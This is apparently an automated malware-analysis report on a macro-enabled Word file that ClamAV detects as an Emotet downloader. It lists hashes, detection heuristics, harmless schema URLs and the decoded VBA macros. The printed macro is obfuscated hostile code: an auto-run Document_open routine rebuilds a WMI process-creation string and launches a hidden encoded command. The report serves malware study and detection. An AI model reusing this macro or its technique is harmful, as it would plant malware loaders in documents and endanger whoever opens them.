Malicious Office (OOXML) — malware analysis report

Static analysis result for SHA-256 9b514112c082fa73…

MALICIOUS

Office (OOXML)

123.1 KB Created: 2020-01-30 23:28:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-01
MD5: 01b9a6cd2fafb5d1a40b177156763af2 SHA-1: c2a01ff585b50f8284815c5c8e473a2b74f76854 SHA-256: 9b514112c082fa73e81892678cd5c8d94b58ecc18596b1388708fd3a331d69d7
230 Risk Score

Heuristics 6

  • ClamAV: Doc.Downloader.Emotet-7571261-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Emotet-7571261-0
  • VBA project inside OOXML medium 3 related findings OOXML_VBA
    Document contains a VBA project — VBA macros present
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set Ijsakakqbmon = GetObject(Vfyqfqslls)
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Private Sub Document_open()
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
    • http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
    • http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source from OOXML) 5458 bytes
SHA-256: 8ee7fa1705247ba7d55bf940f96742c7b0280e990fa3de1593988ad357782148
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Znygfcfaofdp"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
   iewrf = 949
sd = Trim _
(701)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(105)
fe = Trim(Qlttiyeyvuzj)
vfd = Trim("{Polic}")
nxss = Trim _
(49)
Xamqpgpsunk.Qnlrkvkq
End Sub


Attribute VB_Name = "Yxitugqfcmebv"
Attribute VB_Base = "0{B13285D4-5531-4FD9-A202-FA5B592559C9}{8E9D0F30-9C37-41EA-828C-B15D0A559CD5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

Attribute VB_Name = "Pfhpydqhvdo"
Attribute VB_Base = "0{1DBE9F82-F42B-48A2-AB13-0115BCF81B2C}{E5DD9A42-63B2-4DBF-8948-57B77FCA2F5A}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Sub Khctescsv()
Debug.Print "Operaion" + NS + "S"
End Sub

Attribute VB_Name = "Xamqpgpsunk"
Function Qnlrkvkq()
   iewrf = 160
sd = Trim _
(159)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(904)
fe = Trim(Nvnosvfpgmru)
vfd = Trim("{Polic}")
nxss = Trim _
(957)
Zjzpajrquqyy = "==/e3n//3^w==/e3n//3^==/e3n//3^==" + "/e3n//3^i==/e3n//3^==/e3n//3^" + "nmg==/e3n//3^mt==/e3n//3^==/e3n//3^" + ChrW(Int(wdKeyS)) + "==/e3n//3^:w==/e3n//3^in==" + "/e3n//3^==/e3n//3^3==/e3n//3^2_" + Yxitugqfcmebv.Pvzphddyxmu + "ro==/e3n//3^ce==/e3n" + "//3^==/e3n//3^s==/e3n//3^s"
   iewrf = 686
sd = Trim _
(132)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(405)
fe = Trim(Qktbycjcehag)
vfd = Trim("{Polic}")
nxss = Trim _
(188)
Vfyqfqslls = Dqsnhaybnak(Zjzpajrquqyy)
   iewrf = 822
sd = Trim _
(294)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(40)
fe = Trim(Lcezclbydwdym)
vfd = Trim("{Polic}")
nxss = Trim _
(275)
Set Ijsakakqbmon = GetObject(Vfyqfqslls)
   iewrf = 231
sd = Trim _
(226)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(644)
fe = Trim(Mtttmqusk)
vfd = Trim("{Polic}")
nxss = Trim _
(277)
Snwirwowq = Yxitugqfcmebv.Lqtowovkqje.Tag
   iewrf = 655
sd = Trim _
(649)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(512)
fe = Trim(Fviocgotmnt)
vfd = Trim("{Polic}")
nxss = Trim _
(628)
Saechkecezpw = Vfyqfqslls + ChrW(Int(wdKeyS)) + Yxitugqfcmebv.Obmcfaqxbbym.Tag + Snwirwowq
   iewrf = 355
sd = Trim _
(400)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(918)
fe = Trim(Tyzholsqtuhr)
vfd = Trim("{Polic}")
nxss = Trim _
(996)
Ryobqqij = Saechkecezpw + Yxitugqfcmebv.Pvzphddyxmu
   iewrf = 279
sd = Trim _
(884)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(59)
fe = Trim(Oijaxbxct)
vfd = Trim("{Polic}")
nxss = Trim _
(931)
Call Ijsakakqbmon. _
Create(Xpkanutse, Hcdvdtuazcp, Czvaqftf(Ryobqqij), Fuzcoaytbsvz, Htxrlssjnjp, Rkdxxqntiqmuj)
   iewrf = 48
sd = Trim _
(864)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(763)
fe = Trim(Jvidadxdm)
vfd = Trim("{Polic}")
nxss = Trim _
(681)
End Function
Function Czvaqftf(Fdsoxfme)
   iewrf = 727
sd = Trim _
(568)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(265)
fe = Trim(Mpkfcutdqi)
vfd = Trim("{Polic}")
nxss = Trim _
(33)
Set Czvaqftf = GetObject(Fdsoxfme)
   iewrf = 130
sd = Trim _
(298)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(337)
fe = Trim(Ejldppoiglv)
vfd = Trim("{Polic}")
nxss = Trim _
(598)
Czvaqftf. _
showwindow = Fjivzemgckdiz + Pmubhiyvx
   iewrf = 45
sd = Trim _
(391)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(748)
fe = Trim(Vrwzbbqmsbs)
vfd = Trim("{Polic}")
nxss = Trim _
(151)
End Function
Function Dqsnhaybnak(Tkzytblabfuul)
   iewrf = 955
sd = Trim _
(430)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(103)
fe = Trim(Dbofmyplae)
vfd = Trim("{Polic}")
nxss = Trim _
(299)
Dqsnhaybnak = Join(Split(Tkzytblabfuul, "==/e3n//3^"), "" + N)
   iewrf = 785
sd = Trim _
(744)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(223)
fe = Trim(Ritgaqhkrw)
vfd = Trim("{Polic}")
nxss = Trim _
(312)
End Function
Function Xpkanutse()
   iewrf = 469
sd = Trim _
(893)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(703)
fe = Trim(Qbjioyxlbmvb)
vfd = Trim("{Polic}")
nxss = Trim _
(120)
Ykgqjwpxvoch = ChrW(Int(wdKeyP))
   iewrf = 806
sd = Trim _
(203)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(297)
fe = Trim(Qupnofjfjel)
vfd = Trim("{Polic}")
nxss = Trim _
(184)
Obcpzknaua = Ykgqjwpxvoch + Yxitugqfcmebv.Wpxsqddgpwl.ControlTipText + "-e "
   iewrf = 918
sd = Trim _
(278)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(181)
fe = Trim(Vrrtanihq)
vfd = Trim("{Polic}")
nxss = Trim _
(569)
dse = Yxitugqfcmebv.Typnpwylqk.ControlTipText
   iewrf = 90
sd = Trim _
(797)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(893)
fe = Trim(Orrudnsweo)
vfd = Trim("{Polic}")
nxss = Trim _
(947)
Xpkanutse = Dqsnhaybnak(Obcpzknaua + StrReverse(dse))
   iewrf = 115
sd = Trim _
(590)
f = Trim("{Polic}")
ffv = Trim("{Polic}")
r = Trim(554)
fe = Trim(Kwrllcznrfy)
vfd = Trim("{Polic}")
nxss = Trim _
(355)
End Function
vbaProject_00.bin vba-project OOXML VBA project: word/vbaProject.bin 42496 bytes
SHA-256: 690ddabe49b628cb0310187999b65fb2a5df9b9b2ed824ea833b65332c172947
Detection
ClamAV: Doc.Downloader.Emotet-7571261-0
Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.